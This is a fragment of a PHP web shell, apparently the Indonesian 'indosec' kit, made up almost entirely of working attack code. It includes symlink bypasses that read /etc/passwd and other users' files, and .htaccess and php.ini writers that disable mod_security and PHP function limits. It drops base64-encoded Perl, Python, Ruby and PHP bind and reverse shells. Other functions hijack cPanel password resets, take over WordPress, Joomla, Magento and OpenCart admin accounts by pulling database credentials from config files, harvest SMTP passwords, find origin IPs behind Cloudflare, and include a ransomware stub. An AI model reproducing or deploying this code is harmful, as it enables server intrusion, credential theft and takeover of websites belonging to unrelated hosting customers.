'; } else { $TEST = @file('/etc/passwd'); if ($TEST) { @mkdir('indosec_sym', 0777); @chdir('indosec_sym'); @exe('ln -s / root'); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex indsc.html AddType text/plain php html php5 phtml AddHandler text/plain php html php5 phtml Satisfy Any'; $fp3 = fopen('.htaccess', 'w'); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
"; $dcount = 1; $file = fopen('/etc/passwd', 'r') or exit('Unable to open file!'); while (!feof($file)) { $s = fgets($file); $matches = []; $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace('home/', '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == 'bin' || $matches == 'etc/X11/fs' || $matches == 'var/lib/nfs' || $matches == 'var/arpwatch' || $matches == 'var/gopher' || $matches == 'sbin' || $matches == 'var/adm' || $matches == 'usr/games' || $matches == 'var/ftp' || $matches == 'etc/ntp' || $matches == 'var/www' || $matches == 'var/named') { continue; } echo '"; $dcount++; } fclose($file); echo '
No. Users symlink
'.$dcount.' '.$matches." Symlink
'; } else { $os = explode(' ', php_uname()); if ($os[0] != 'Windows') { @mkdir('indosec_sym', 0777); @chdir('indosec_sym'); @exe('ln -s / root'); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex indsc.html AddType text/plain php html php5 phtml AddHandler text/plain php html php5 phtml Satisfy Any'; $fp3 = fopen('.htaccess', 'w'); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
"; $temp = ''; $val1 = 0; $val2 = 1000; for (; $val1 <= $val2; $val1++) { $uid = @posix_getpwuid($val1); if ($uid) { $temp .= implode(':', $uid)."\n"; } } echo '
'; $temp = trim($temp); $file5 = fopen('test.txt', 'w'); fwrite($file5, $temp); fclose($file5); $dcount = 1; $file = fopen('test.txt', 'r') or exit('Unable to open file!'); while (!feof($file)) { $s = fgets($file); $matches = []; $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace('home/', '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == 'bin' || $matches == 'etc/X11/fs' || $matches == 'var/lib/nfs' || $matches == 'var/arpwatch' || $matches == 'var/gopher' || $matches == 'sbin' || $matches == 'var/adm' || $matches == 'usr/games' || $matches == 'var/ftp' || $matches == 'etc/ntp' || $matches == 'var/www' || $matches == 'var/named') { continue; } echo '"; $dcount++; } fclose($file); echo '
ID. Users symlink
'.$dcount.' '.$matches." Symlink
'; unlink('test.txt'); } } } exit; } function aksiSymread($dir, $file) { echo "read /etc/named.conf

"; if (isset($_GET['save'])) { $cont = stripcslashes($_POST['file']); $f = fopen('named.txt', 'w'); $w = fwrite($f, $cont); if ($w) { echo '
save has been successfully'; } fclose($f); } exit; } function sym404($dir, $file) { $cp = get_current_user(); if ($_POST['execute']) { @rmdir('indosec_sym404'); @mkdir('indosec_sym404', 0777); $dir = $_POST['dir']; $isi = $_POST['isi']; @system('ln -s '.$dir.'indosec_sym404/'.$isi); @symlink($dir, 'indosec_sym404/'.$isi); $inija = fopen('indosec_sym404/.htaccess', 'w'); @fwrite($inija, 'ReadmeName '.$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain php html php5 phtml\nAddHandler text/plain php html php5 phtml\nSatisfy Any"); echo'Click Me!!'; } else { echo '

Symlink 404

File Target:
Save As:

NB: Letak wp-config tidak semuanya berada di public_html/wp-config.php jadi silahkan ubah sesuai letaknya.

'; } exit; } function symBypass($dir, $file) { $full = str_replace($_SERVER['DOCUMENT_ROOT'], '', $dir); $pageFTP = 'ftp://'.$_SERVER['SERVER_NAME'].'/public_html/'.$_SERVER['REQUEST_URI']; $u = explode('/', $pageFTP); $pageFTP = str_replace($u[count($u) - 1], '', $pageFTP); if (isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0) { $cont = stripcslashes($_POST['file']); if (!file_exists('passwd.txt')) { $f = @fopen('passwd.txt', 'w'); $w = @fwrite($f, $cont); fclose($f); } if ($w or @filesize('passwd.txt') > 0) { echo "
"; flush(); $fil3 = file('passwd.txt'); foreach ($fil3 as $f) { $u = explode(':', $f); $user = $u['0']; echo ""; flush(); flush(); } echo '
Users symlink FTP
$user Symlink FTP
'; die(); } } echo "read /etc/passwd error ? Bypass Here

"; flush(); exit; } function bcTool($dir, $file) { echo "

Back Connect Tools

Bind port to /bin/sh [Perl]
Back-Connect
"; if ($_POST['bpl']) { $bp = base64_decode('IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0='); $brt = @fopen('bp.pl', 'w'); fwrite($brt, $bp); $out = exe('perl bp.pl '.$_POST['port'].' 1>/dev/null 2>&1 &'); sleep(1); echo "
$out\n".exe('ps aux | grep bp.pl').'
'; unlink('bp.pl'); } if ($_POST['backconnect'] == 'perl') { $bc = base64_decode('IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7'); $plbc = @fopen('bc.pl', 'w'); fwrite($plbc, $bc); $out = exe('perl bc.pl '.$_POST['server'].' '.$_POST['port'].' 1>/dev/null 2>&1 &'); sleep(1); echo "
$out\n".exe('ps aux | grep bc.pl').'
'; unlink('bc.pl'); } if ($_POST['backconnect'] == 'python') { $becaa = base64_decode('IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk='); $pbcaa = @fopen('bcpyt.py', 'w'); fwrite($pbcaa, $becaa); $out1 = exe('python bcpyt.py '.$_POST['server'].' '.$_POST['port']); sleep(1); echo "
$out1\n".exe('ps aux | grep bcpyt.py').'
'; unlink('bcpyt.py'); } if ($_POST['backconnect'] == 'ruby') { $becaak = base64_decode('IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k'); $pbcaak = @fopen('bcruby.rb', 'w'); fwrite($pbcaak, $becaak); $out2 = exe('ruby bcruby.rb '.$_POST['server'].' '.$_POST['port']); sleep(1); echo "
$out2\n".exe('ps aux | grep bcruby.rb').'
'; unlink('bcruby.rb'); } if ($_POST['backconnect'] == 'php') { $ip = $_POST['server']; $port = $_POST['port']; $sockfd = fsockopen($ip, $port, $errno, $errstr); if ($errno != 0) { echo "$errno : $errstr"; } elseif (!$sockfd) { $result = '

Unexpected error has occured, connection may have failed.

'; } else { fwrite($sockfd, " \n{#######################################} \n..:: BackConnect PHP By Con7ext ::.. \n{#######################################}\n"); $dir = @shell_exec('pwd'); $sysinfo = @shell_exec('uname -a'); $time = @shell_exec('time'); $len = 1337; fwrite($sockfd, 'User ', $sysinfo, 'connected @ ', $time, "\n\n"); while (!feof($sockfd)) { $cmdPrompt = '[kuda]#:> '; @fwrite($sockfd, $cmdPrompt); $command = fgets($sockfd, $len); @fwrite($sockfd, "\n".@shell_exec($command)."\n\n"); } @fclose($sockfd); } } exit; } function disabFunc($dir, $file) { echo "

Bypass Disable Functions

"; if (isset($_POST['ini'])) { $file = fopen('php.ini', 'w'); echo fwrite($file, "safe_mode = OFF\ndisable_functions = NONE"); fclose($file); echo "Klik Coeg!"; } elseif (isset($_POST['htce'])) { $file = fopen('.htaccess', 'w'); echo fwrite($file, "\nSecFilterEngine Off\nSecFilterScanPOST Off\n"); fclose($file); echo '

.htaccess successfully created!

'; } elseif (isset($_POST['litini'])) { $iniph = 'PD8gZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbImZpbGUiXSk7DQplY2hvIGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbInNzIl07DQo/Pg=='; $byph = "safe_mode = OFF\ndisable_functions = NONE"; $comp = "\nForceType application/x-httpd-php4\n"; file_put_contents('php.ini', $byph); file_put_contents('ini.php', $iniph); file_put_contents('.htaccess', $comp); $swa = 'success'; $text = 'Disable Functions in Litespeed Created'; swall($swa, $text, $dir); } echo '
'; } function resetCp($dir) { echo '
Auto Reset Password Cpanel
'; if (isset($_POST['submit'])) { $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $ips = getenv('REMOTE_ADDR'); $email = $_POST['email']; $wr = 'email:'.$email; $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w'); @fwrite($f, $wr); @fclose($f); $f = fopen('/home/'.$user.'/.contactinfo', 'w'); @fwrite($f, $wr); @fclose($f); $parm = $site.':2082/resetpass?start=1'; echo '
Url: '.$parm.''; echo '
Username: '.$user.''; echo '
Success Reset To: '.$email.'

'; } exit; } function autoEdit($dir, $file) { if ($_POST['hajar']) { if (strlen($_POST['pass_baru']) < 6 or strlen($_POST['user_baru']) < 6) { echo 'Username dan Password harus lebih dari 6 karakter'; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach ($scan_conf as $file_conf) { if (!is_file("$conf/$file_conf")) { continue; } $config = file_get_contents("$conf/$file_conf"); if (preg_match('/JConfig|joomla/', $config)) { $dbhost = ambilkata($config, "host = '", "'"); $dbuser = ambilkata($config, "user = '", "'"); $dbpass = ambilkata($config, "password = '", "'"); $dbname = ambilkata($config, "db = '", "'"); $dbprefix = ambilkata($config, "dbprefix = '", "'"); $prefix = $dbprefix.'users'; $conn = mysqli_connect($dbhost, $dbuser, $dbpass); $db = mysqli_select_db($conn, $dbname); $q = mysqli_query($conn, "SELECT * FROM $prefix ORDER BY id ASC"); $result = mysqli_fetch_array($q); $id = $result['id']; $site = ambilkata($config, "sitename = '", "'"); $update = mysqli_query($conn, "UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); echo 'Config => '.$file_conf.'
'; echo 'CMS => Joomla
'; if ($site == '') { echo 'Sitename => error, gabisa ambil nama domain nya
'; } else { echo "Sitename => $site
"; } if (!$update or !$conn or !$db) { echo 'Status => '.mysqli_error($conn).'

'; } else { echo 'Status => Sukses, Silakan login dengan User & Password yang baru.

'; } mysqli_close($conn); } elseif (preg_match('/WordPress/', $config)) { $dbhost = ambilkata($config, "DB_HOST', '", "'"); $dbuser = ambilkata($config, "DB_USER', '", "'"); $dbpass = ambilkata($config, "DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "DB_NAME', '", "'"); $dbprefix = ambilkata($config, "table_prefix = '", "'"); $prefix = $dbprefix.'users'; $option = $dbprefix.'options'; $conn = mysqli_connect($dbhost, $dbuser, $dbpass); $db = mysqli_select_db($conn, $dbname); $q = mysqli_query($conn, "SELECT * FROM $prefix ORDER BY id ASC"); $result = mysqli_fetch_array($q); $id = $result['id']; $q2 = mysqli_query($conn, "SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysqli_fetch_array($q2); $target = $result2['option_value']; if ($target == '') { $url_target = 'Login => Error, Tidak dapat mengambil nama domainnya
'; } else { $url_target = "Login => $target/wp-login.php
"; } $update = mysqli_query($conn, "UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo 'Config => '.$file_conf.'
'; echo 'CMS => Wordpress
'; echo $url_target; if (!$update or !$conn or !$db) { echo 'Status => '.mysqli_error($conn).'

'; } else { echo 'Status => Sukses, Silakan login dengan User & Password yang baru.

'; } mysqli_close($conn); } elseif (preg_match('/Magento|Mage_Core/', $config)) { $dbhost = ambilkata($config, ''); $dbuser = ambilkata($config, ''); $dbpass = ambilkata($config, ''); $dbname = ambilkata($config, ''); $dbprefix = ambilkata($config, ''); $prefix = $dbprefix.'admin_user'; $option = $dbprefix.'core_config_data'; $conn = mysqli_connect($dbhost, $dbuser, $dbpass); $db = mysqli_select_db($conn, $dbname); $q = mysqli_query($conn, "SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysqli_fetch_array($q); $id = $result['user_id']; $q2 = mysqli_query($conn, "SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysqli_fetch_array($q2); $target = $result2['value']; if ($target == '') { $url_target = 'Login => Error, Tidak dapat mengambil nama domainnya
'; } else { $url_target = "Login => $target/admin/
"; } $update = mysqli_query($conn, "UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo 'Config => '.$file_conf.'
'; echo 'CMS => Magento
'; echo $url_target; if (!$update or !$conn or !$db) { echo 'Status => '.mysqli_error($conn).'

'; } else { echo 'Status => Sukses, Silakan login dengan User & Password yang baru.

'; } mysqli_close($conn); } elseif (preg_match('/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/', $config)) { $dbhost = ambilkata($config, "'DB_HOSTNAME', '", "'"); $dbuser = ambilkata($config, "'DB_USERNAME', '", "'"); $dbpass = ambilkata($config, "'DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "'DB_DATABASE', '", "'"); $dbprefix = ambilkata($config, "'DB_PREFIX', '", "'"); $prefix = $dbprefix.'user'; $conn = mysqli_connect($dbhost, $dbuser, $dbpass); $db = mysqli_select_db($conn, $dbname); $q = mysqli_query($conn, "SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysqli_fetch_array($q); $id = $result['user_id']; $target = ambilkata($config, "HTTP_SERVER', '", "'"); if ($target == '') { $url_target = 'Login => Error, Tidak dapat mengambil nama domainnya
'; } else { $url_target = "Login => $target
"; } $update = mysqli_query($conn, "UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo 'Config => '.$file_conf.'
'; echo 'CMS => OpenCart
'; echo $url_target; if (!$update or !$conn or !$db) { echo 'Status => '.mysqli_error($conn).'

'; } else { echo 'Status => Sukses, Silakan login dengan User & Password yang baru.

'; } mysqli_close($conn); } elseif (preg_match('/panggil fungsi validasi xss dan injection/', $config)) { $dbhost = ambilkata($config, 'server = "', '"'); $dbuser = ambilkata($config, 'username = "', '"'); $dbpass = ambilkata($config, 'password = "', '"'); $dbname = ambilkata($config, 'database = "', '"'); $prefix = 'users'; $option = 'identitas'; $conn = mysqli_connect($dbhost, $dbuser, $dbpass); $db = mysqli_select_db($conn, $dbname); $q = mysqli_query($conn, "SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysqli_fetch_array($q); $target = $result['alamat_website']; if ($target == '') { $target2 = $result['url']; $url_target = 'Login => Error, Tidak dapat mengambil nama domainnya
'; if ($target2 == '') { $url_target2 = 'Login => Error, Tidak dapat mengambil nama domainnya
'; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if (preg_match('/CMS Lokomedia|Administrator/', $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif (preg_match('/CMS Lokomedia|Lokomedia/', $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if (preg_match('/CMS Lokomedia|Administrator/', $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif (preg_match('/CMS Lokomedia|Lokomedia/', $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; } } $update = mysqli_query($conn, "UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo 'Config => '.$file_conf.'
'; echo 'CMS => Lokomedia
'; if (preg_match('/Error, Tidak dapat mengambil nama domainnya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if (!$update or !$conn or !$db) { echo 'Status => '.mysqli_error($conn).'

'; } else { echo 'Status => Sukses, Silakan login dengan User & Password yang baru.

'; } mysqli_close($conn); } } } } else { echo "

Auto Edit User

Lokasi Dir Config
Set User & Pass :

NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

"; } exit; } function ransom($dir, $file) { if (isset($_POST['encrypt'])) { $dir = $_POST['target']; echo"
'; } else { echo '

Ransomware

'; } exit; } function scj($dir) { $dirs = scandir($dir); foreach ($dirs as $dirb) { if (!is_file("$dir/$dirb")) { continue; } $ambil = file_get_contents("$dir/$dirb"); $ambil = str_replace('$', '', $ambil); if (preg_match('/JConfig|joomla/', $ambil)) { $smtp_host = ambilkata($ambil, "smtphost = '", "'"); $smtp_auth = ambilkata($ambil, "smtpauth = '", "'"); $smtp_user = ambilkata($ambil, "smtpuser = '", "'"); $smtp_pass = ambilkata($ambil, "smtppass = '", "'"); $smtp_port = ambilkata($ambil, "smtpport = '", "'"); $smtp_secure = ambilkata($ambil, "smtpsecure = '", "'"); echo "
SMTP Host: $smtp_host
SMTP Port: $smtp_port
SMTP User: $smtp_user
SMTP Pass: $smtp_pass
SMTP Auth: $smtp_auth
SMTP Secure: $smtp_secure
"; } } echo "

NB : Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/namafolder_config )

"; exit; } function bypasscf() { echo '
Bypass Cloud Flare
'; $target = $_POST['target']; if ($_POST['idsPilih'] == 'ftp') { $ftp = gethostbyname('ftp.'."$target"); echo "

Correct ip is : $ftp

"; } if ($_POST['idsPilih'] == 'direct-conntect') { $direct = gethostbyname('direct-connect.'."$target"); echo "

Correct ip is : $direct

"; } if ($_POST['idsPilih'] == 'webmail') { $web = gethostbyname('webmail.'."$target"); echo "

Correct ip is : $web

"; } if ($_POST['idsPilih'] == 'cpanel') { $cpanel = gethostbyname('cpanel.'."$target"); echo "

Correct ip is : $cpanel

